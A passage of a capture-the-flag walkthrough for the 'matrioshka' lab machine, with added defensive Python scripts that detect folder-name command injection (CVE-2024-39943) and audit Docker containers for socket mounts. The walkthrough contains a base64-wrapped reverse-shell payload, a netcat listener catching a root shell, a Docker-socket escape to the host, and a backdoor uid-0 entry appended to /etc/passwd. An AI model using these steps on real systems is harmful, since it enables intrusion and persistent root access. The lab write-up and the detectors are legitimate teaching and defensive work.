YmFzaCAvdG1wL3Jldi5zaA==
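The PoC analysis above shows that the injection lives entirely in a folder name that get_ls later concatenates into a shell command, and the modified name in /tmp carries the real command as base64. The following added example (not part of the original post or the PoC repository) is the defender's counterpart: it scans a directory listing for names containing shell metacharacters and decodes the base64 payload hidden in the python3 -c wrapper, so an analyst can see what such a folder would have run. The sample listing is constructed; the only real value in it is the base64 of "bash /tmp/rev.sh" computed on the page.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Characters that let a folder name break out of a shell command string. The
# CVE-2024-39943 bug runs `df` through a shell (execSync) with the requested
# path, so any of these in a name is a red flag; the fix is to pass the path
# as an argv element (spawnSync) rather than build a shell string.
SHELL_META = re.compile(r'[";\'`$|&<>()]')

# The PoC hides the real command as base64 inside a python3 -c wrapper.
B64_WRAPPER = re.compile(r"b64decode\('([A-Za-z0-9+/=]+)'\)")


@dataclass
class Finding:
    name: str
    reason: str
    decoded_command: Optional[str]


def inspect_folder_name(name: str) -> Optional[Finding]:
    """Return a Finding when a folder name looks like an injection vector, else None."""
    if not SHELL_META.search(name):
        return None
    decoded = None
    m = B64_WRAPPER.search(name)
    if m:
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            decoded = None
    reason = "base64 payload in python3 -c wrapper" if decoded else "shell metacharacters in name"
    return Finding(name=name, reason=reason, decoded_command=decoded)


def scan_folder_names(names: List[str]) -> List[Finding]:
    """Run inspect_folder_name over a directory listing (e.g. os.listdir('/tmp'))."""
    return [f for f in map(inspect_folder_name, names) if f is not None]


# Constructed sample listing: a benign name, the folder name the modified PoC
# leaves in /tmp (base64 of "bash /tmp/rev.sh"), and a name with a bare ';'.
SAMPLE_NAMES = [
    "systemd-private-abc",
    "poc\";python3 -c \"import os;import base64;os.system(base64.b64decode('YmFzaCAvdG1wL3Jldi5zaA=='))\"",
    "report; id",
]

if __name__ == "__main__":
    for f in scan_folder_names(SAMPLE_NAMES):
        print(f"{f.reason}: {f.name!r} -> {f.decoded_command!r}")
```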

Root Privilege Escalation

Listen on the port; we get a shell in the Docker container.

matrioshka@matrioshka:~$ busybox nc -lp 4444
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@39cfe3c81ea8:~/.hfs# id
id
uid=0(root) gid=0(root) groups=0(root)
root@39cfe3c81ea8:~/.hfs# ls -al
ls -al
total 28
drwxr-xr-x 4 root root 4096 Mar 9 13:27 .
drwx------ 1 root root 4096 Mar 9 08:28 ..
-rw-r--r-- 1 root root 32 Mar 9 12:29 custom.html
-rw-r--r-- 1 root root 402 Mar 9 12:27 debug.log
drwxr-xr-x 2 root root 4096 Mar 9 08:28 logs
drwxr-xr-x 2 root root 4096 Mar 9 08:28 plugins
-rw-r--r-- 1 root root 33 Aug 22 2024 user.txt

However, I searched for a long time and found nothing useful.

Docker Privilege Escalation

Finally I noticed that Docker is installed inside the Docker container.

Three containers are running; one of them is an Ubuntu container. Looking at the container IDs...

Hey, isn't that the current container, 39cfe3c81ea8?

root@39cfe3c81ea8:~/.hfs# docker ps
docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
39cfe3c81ea8 ubuntu:20.04 "/bin/bash -c 'apt-g…" 6 hours ago Up 6 hours 127.0.0.1:9090->80/tcp docker-hfs_hfs_1
8485358c3c48 mysql:8.0.0 "docker-entrypoint.s…" 6 months ago Up 6 hours 3306/tcp docker-wp_db_1
3ed5ddfe0e0c wordpress "docker-entrypoint.s…" 6 months ago Up 6 hours 127.0.0.1:8080->80/tcp docker-wp_wordpress_1

Try privilege escalation via Docker: run a new container and chroot into the host's root filesystem.

This reveals the root flag.

root@39cfe3c81ea8:~/.hfs# docker run -v /:/mnt --rm -it ubuntu:20.04 chroot /m>
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
08e9a3ae7c84
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
15: eth0@if16: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
# ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
# cd /root
# ls
root.txt
# cat root.txt
7f5d6dbbaff0a1fc6d2a5c9160362908

Later I learned that it was not a second Docker installed inside the container at all; the Docker socket is mounted into it.

root@matrioshka:/home/matrioshka# docker inspect 39
"Volumes": {
"/opt/hfs/config.yaml": {},
"/opt/hfs/data": {},
"/opt/hfs/hfs-linux.zip": {},
"/var/run/docker.sock": {}
},

Otherwise the performance cost would be far too high.

The host already has Docker installed, and Docker exposes its API through the dockerd process.

The container is not actually running a Docker daemon (dockerd); it uses the host's Docker directly, which effectively turns the container into a Docker client.

Advantages

Lightweight: no need to run dockerd inside the container
Good compatibility: does not disrupt the host's Docker setup
High privilege: direct control over the host's Docker

Disadvantages

Security risk: the container has full control over the host's Docker; if it is compromised, an attacker controls every container on the host!
It cannot actually run a Docker daemon; it only acts as a client of the host's Docker API.
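The security risk above is exactly what the docker inspect output shows: /var/run/docker.sock mounted into the hfs container. The following added example (not from the original post) is an audit check that reads docker inspect JSON and flags containers that are effectively root on the host; beyond the socket mount the page demonstrates, it also flags privileged containers, host PID namespace and a bind mount of /. The sample input is constructed in the shape of docker inspect output (Mounts and HostConfig are its real keys); the container IDs are the ones on the page, the mount destinations are assumed.

```python
import json
from typing import Dict, List

# Constructed sample modelled on the walkthrough: the hfs container has
# /var/run/docker.sock bind-mounted, the wordpress container does not.
# Destinations are assumptions; the page only lists the host-side sources.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "39cfe3c81ea8",
        "Name": "/docker-hfs_hfs_1",
        "HostConfig": {"Privileged": False, "PidMode": ""},
        "Mounts": [
            {"Type": "bind", "Source": "/opt/hfs/data", "Destination": "/root/.hfs"},
            {"Type": "bind", "Source": "/var/run/docker.sock",
             "Destination": "/var/run/docker.sock"},
        ],
    },
    {
        "Id": "3ed5ddfe0e0c",
        "Name": "/docker-wp_wordpress_1",
        "HostConfig": {"Privileged": False, "PidMode": ""},
        "Mounts": [
            {"Type": "volume", "Source": "/var/lib/docker/volumes/wp/_data",
             "Destination": "/var/www/html"},
        ],
    },
])

# Paths at which the host's Docker API socket usually lives.
DOCKER_SOCKETS = {"/var/run/docker.sock", "/run/docker.sock"}


def audit_containers(inspect_json: str) -> Dict[str, List[str]]:
    """Map container id -> reasons it is effectively root on the host ([] = clean)."""
    findings: Dict[str, List[str]] = {}
    for c in json.loads(inspect_json):
        reasons: List[str] = []
        host = c.get("HostConfig", {})
        if host.get("Privileged"):
            reasons.append("privileged container")
        if host.get("PidMode") == "host":
            reasons.append("shares host PID namespace")
        for m in c.get("Mounts", []):
            # Only bind mounts expose host paths; named volumes are docker-managed.
            if m.get("Type") != "bind":
                continue
            src = m.get("Source", "")
            if src in DOCKER_SOCKETS:
                reasons.append(f"docker socket bind-mounted at {m.get('Destination')}")
            elif src == "/":
                reasons.append("host root filesystem bind-mounted")
        findings[c["Id"]] = reasons
    return findings


if __name__ == "__main__":
    for cid, reasons in audit_containers(SAMPLE_INSPECT).items():
        print(cid, "OK" if not reasons else "; ".join(reasons))
```

On a real host, feed it the output of `docker inspect $(docker ps -q)` instead of SAMPLE_INSPECT; any container with a non-empty reason list should be treated as having host root.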

Add a root user to passwd to get a root shell, although the Docker shell is already essentially a root shell.

# echo "primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash" >>/etc/passwd
# exit
root@39cfe3c81ea8:~/.hfs# exit
exit
matrioshka@matrioshka:~$
logout
Connection to 192.168.60.236 closed.
❯ ssh matrioshka@$ip
matrioshka@192.168.60.236's password:
Linux matrioshka 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 9 10:21:07 2025 from 192.168.60.100
matrioshka@matrioshka:~$ su primary
Password:
root@matrioshka:/home/matrioshka# id
uid=0(root) gid=0(root) groups=0(root)
root@matrioshka:/home/matrioshka#